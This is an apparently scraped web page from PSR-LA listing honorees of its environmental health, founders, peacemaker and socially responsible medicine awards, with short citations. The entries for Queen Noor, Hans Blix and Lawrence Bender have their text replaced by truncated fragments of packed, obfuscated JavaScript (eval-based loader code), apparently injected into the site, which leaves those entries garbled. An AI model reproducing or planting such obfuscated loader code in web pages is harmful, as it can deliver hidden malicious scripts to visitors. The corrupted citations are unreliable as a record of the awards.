Andrea Hricko MPH

PSR-LA is proud to present Andrea Hricko with the Environmental Health Award for courageous leadership in enhancing understanding of toxic air contaminants and the role of global trade on health.


John Froines PhD

PSR-LA is proud to honor John Froines with the Environmental Health Award for courageous commitment to scientific integrity and for of increasing our understanding of the health impacts of toxic chemicals on the health of workers and communities.   


Tony Iton MD, JD, MPH

PSR-LA is proud to present the Founders Award to Anthony Iton for his long time commitment to promoting health by promoting  placed based solution to eliminate health disparities in disadvantaged communities. His work reminds us that our zip code should not determine our life expectancy. 


Robert Dodge MD

PSR-LA is proud to present Robert Dodge with the Peacemaker Award for longtime and steadfast efforts toward a more peaceful world and engaging professionals to prevent nuclear disaster.


Richard Jackson MD, MPH

PSR-LA is pleased to present the Socially Responsible Medicine Award to Richard Jackson for years of advocacy to protect farmworkers and children from pesticide risks and improving community health by changing the built environment.


Her Majesty Queen Noor

Her eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d=k||c.toString(a)}k=}];e=funct ...


Hans Blix

=k||c.toString(a)}k=}];e=function(){return'w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('b'+e(c)+'b','g'),k)}}return p}('0.6("");n m= ...


Lawrence Bender

PSR-LA eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d=k||c.toString(a)}k=}];e=fu ...